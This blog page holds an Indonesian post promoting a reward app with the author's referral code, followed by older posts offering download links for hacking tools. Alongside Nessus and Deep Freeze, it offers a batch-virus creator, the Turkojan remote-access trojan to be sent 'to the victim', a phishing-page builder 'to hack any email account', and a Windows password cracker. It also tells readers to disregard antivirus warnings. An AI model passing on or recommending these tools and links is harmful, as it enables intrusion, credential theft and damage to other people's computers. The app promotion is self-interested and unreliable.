Pages

Thursday, March 19, 2015

CARA MENDAPATKAN UANG DOLLAR DI HAPE ANDROID

0 comments
Kali ini saya akan ngasih tau agan cara dapatkan uang dengan mudah atau bisa dibilang mudah banget

Nama aplikasi ini nama nya WHAFF REWADS
Aplikasi menggunakan uang dollar, jadi lumayan tuh kalau di tuker ke rupiah hahaha

oke kita mulai aja yah gan ;D
1. Pertama agan harus download dulu aplikasi nya Disini

2. kedua setelah di download, agan masuk / log in, cukup mudah hanya dengan fb agan saja

3. setelah di agan masuk disitu whaff minta masukin kode

4. nah agan masukin kode " AZ89815 "

5. agan harus masukin kodenya agar bisa dapet uang muka 0,3$ atau setara 3900 rupiah lumayan kan hehe

6. nah setelah begitu disana ada suruhan dari aplikasi tersebut dan ada masing masing imbalannya

7.kalau udah banyak lumayan tuh bisa tuker ama paypal, playstore yang khususnya agan yang suka maen CoC buat beli GEM hehe

yahhh cukup segini gan kalau ada kekurangannya ;D

boleh copy asal cantumin nama ane gan hahahah

BYE!!!

Tuesday, March 26, 2013

VULNERABILITY ASSESSMENT TOOL : NESSUS

0 comments


Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

Download from Nessus Official Website:

http://www.nessus.org/download

PROTECT YOUR COMPUTER FROM VIRUSES : DEEP FREEZE

0 comments


Deep Freeze helps eliminate computer damage and downtime by making computer configurations indestructible. Once Deep Freeze is installed on a workstation, any changes made to the computer — regardless of whether they are accidental or malicious — are never permanent. Deep Freeze provides immediate immunity from many of the problems that plague computers today—inevitable configuration drift, accidental system misconfiguration, malicious software activity, and incidental system degradation. Deep Freeze ensures computers are absolutely bulletproof, even when users have full access to system software and settings. Users get to enjoy a pristine and unrestricted computing experience, while IT personnel are freed from tedious helpdesk requests, constant system maintenance, and continuous configuration drift. 

Download here:  

http://www.mediafire.com/download.php?jtnmzdzt0zn

SONIC BAT - THE BATCH FILE VIRUS CREATOR

0 comments



This program creates batch (.bat) viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood" feature. It also includes bat to exe converter to convert your batch virus files into exe virus programs and an icon changer.

Download here:

http://www.mediafire.com/download.php?ijzjmx3kd3t

HACK COMPUTERS REMOTELY : TURKOJAN GOLD 4

0 comments


Turkojan Gold 4 is a remote access software which creates a backdoor trojan server and connects with it through a client. You need to create the server and send it to the victim and you will be able to not only track every activity on the victim's PC but you will also be able to control it remotely. The client contains numerous options for controlling and manipulating the victim PC in different ways. 

Note : Your antivirus will detect as a HACKTOOL as it is RAT, but don't worry, it is not infected.  

PHISHER CREATOR

0 comments




Phisher Creator is an advanced phishing page builder for all websites. We can create phishing page for any website by using this phisher creator to hack any email account. 

Download here:  

http://www.ziddu.com/download/6966161/PhishcreateV2.rar.html 

Password: hackingguide

WINDOWS PASSWORD RECOVERY TOOL : SAMINSIDE

1 comments

SAMInside recovers Windows NT/2000/XP/2003/Vista user passwords by implementing following types of password attack:
  • Brute-force attack
  • Distributed attack 
  • Mask attack 
  • Dictionary attack 
  • Hybrid attack 
  • Pre-calculated tables attack 
 It includes various types of data imports like LM/NT Hashes, PWDump, LC, LST etc.

Download here:

http://www.mediafire.com/download.php?5mdigznwlzm